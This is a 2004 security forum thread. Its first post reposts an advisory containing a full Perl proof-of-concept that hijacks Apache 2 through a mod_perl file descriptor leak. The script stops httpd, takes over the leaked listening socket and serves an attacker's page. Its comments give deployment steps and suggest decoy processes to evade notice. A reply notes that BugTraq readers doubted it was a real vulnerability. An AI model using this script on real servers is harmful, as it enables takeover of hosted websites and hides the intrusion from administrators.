Forums: Apache 2 Daemon Hijacking Via Mod_perl Exploit - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Apache 2 Daemon Hijacking Via Mod_perl Exploit File Descriptor Leak

#1 User is offline   GaLiaRePt 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 77
  • Joined: 30-July 03

Posted 22 January 2004 - 02:07 PM

Apache 2 Daemon HiJacking via mod_perl File Descriptor Leak Exploit

Date: 2004-01-22
Author : Steve Grubb <linux_4ever@yahoo.com>
Download : http://www.security-..._perl-sploit.pl

#!/usr/bin/perl
###############################################################################
#
#Hijacking Apache 2 via mod_perl
#
#The technique is simple.
#
#1) Fork and daemonize yourself.
#2) Do something evil to apache.
#2) Select on the leaked descriptor and start serving pages.
#
#At the end of this advisory is a proof-of-concept program that you can run under mod_perl. It is assumed
#that paying customers can ftp anything they want into their website and mod_perl scripting is enabled.
#
#cp mod_perl-sploit.pl /var/www/perl
#
#lynx http://localhost/perl/mod_perl-sploit.pl
#
#Now, ps -ef to see how things are going:
#
#apache 3107 2652 0 17:00 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2
#apache 3108 2640 0 17:00 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2
#
#So far, so good...
#
#lynx http://localhost
#
#And you should see the "You're owned" message. The really sneaky part is that 'ps -ef'
#gives only a minor hint that apache has been replaced. The only way to tell something is
#abnormal is that there's only 2 apache instances when a normal Mandrake server in its
#default configuration shows 5 instances. But, forking off a few decoy children should
#be easy enough to do.
#
#This was tested on a fully updated Mandrake 9.2 system.
#
###############################################################################

use POSIX qw(setsid);
                                                                                
if (!defined(my $pid = fork)) {
        print "Content-Type: text/html\n\n";
        print "cannot fork: $!";
        exit 1;
} elsif ($pid) { # This is the parent
        sleep(1);
        print "Content-Type: text/html\n\n";
        print "<html><body>Exploit installed</body></html>";
        system '/usr/sbin/httpd2 -k stop';
        sleep(2);
        exit 0;
}
                                                                                
# This is the Child
setsid;
sleep(2);
my $leak = 4;
open(Server, "+<&$leak");
while (1) {
        my $rin = '';
        vec($rin,fileno(Server),1) = 1;
        $nfound = select($rout = $rin, undef, undef, undef);
        if (accept(Client,Server) ) {
                print Client "HTTP/1.0 200 OK\n";
                print Client "Content-Length: 40\n";
                print Client "Content-Type: text/html\n\n";
                print Client "<html><body>";
                print Client "You're owned.";
                print Client "</body></html>";
                close Client;
        }
}


:ph34r:
0

#2 User is offline   JeiAr 

  • Corporal
  • Icon
  • Group: Specialist
  • Posts: 199
  • Joined: 21-December 03

Posted 22 January 2004 - 02:53 PM

If you read the discussion about this on BugTraq you will see that it really isn't a vuln at all.

Best Regards
0
Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting